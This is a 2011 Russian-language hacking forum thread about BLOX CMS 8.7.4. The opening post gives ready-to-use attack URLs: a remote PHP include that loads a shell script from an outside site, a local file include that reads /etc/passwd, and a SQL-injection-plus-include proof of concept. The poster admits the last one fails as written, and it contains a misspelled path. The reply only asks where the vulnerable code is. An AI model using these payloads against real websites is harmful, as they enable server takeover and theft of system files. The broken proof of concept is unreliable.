ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   BLOX CMS (https://forum.antichat.xyz/showthread.php?t=252531)

[Dark Green] 10.01.2011 21:40
Офф. сайт: Blox.ru | Информация о CMS

Текущая версия: 8.7.4 настолько дырявая, что на раскрутку всех багов уйдет вечность Поэтому я ограничелся несколькими критическими уязвимостями =)

[PHP-Include REMOTE]

BLOX\functions\go.php[8]

register_globals=ON

Код:
http://blox/BLOX/go.php?dbhost=localhost&dbuser=root&dbpass=&dbname=blox&prefix=1&bloxDir=http://site.ru/shell.txt?
[PHP-Include LOCAL]

BLOX\functions\go.php[18], BLOX\functions\getPageParams.php[3]

register_globals=ON

Код:
http://blox/?cmsLanguage=russian/../../../../etc/passwd%00
POC [PHP-Include with SQL Injection]

BLOX\functions\go.php[29, 119-142]

Ошибка в синтаксисе SQL запроса в скрипте, пока косяк в коде не поправят - работать не будет.

Код:
http://blox/?PQ=1&1'UNION(SELECT(1),2,CONCAT('../../../../../../../../../../ect/passwd',0x00))/*
Скачать исходник: http://blox.ru/?download&file=BLOX.8.7.4.zip

Dimi4 04.07.2011 15:17
Йопт, а где уязвимый код???!


Время: 16:02